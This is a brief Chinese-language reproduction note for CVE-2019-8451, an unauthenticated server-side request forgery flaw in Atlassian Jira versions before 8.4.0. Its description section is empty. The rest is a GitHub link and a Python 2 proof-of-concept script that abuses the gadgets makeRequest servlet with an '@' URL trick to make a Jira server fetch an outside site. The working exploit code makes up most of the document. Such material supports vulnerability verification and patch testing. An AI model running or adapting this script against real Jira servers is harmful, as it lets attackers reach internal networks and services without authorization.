(CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证
一、漏洞简介
二、影响范围
Atlassian Jira \< 8.4.0
三、复现过程
https://github.com/ianxtianxt/CVE-2019-8451
#coding:utf-8
import requests
host = 'http://xx.xx.xx.xx:8080'
header = {
'X-Atlassian-Token': 'no-check',
'Connection': 'close'
}
url = host + '/plugins/servlet/gadgets/makeRequest?url='+host+'@www.baidu.com/'
html = requests.get(url = url,headers = header)
print html.text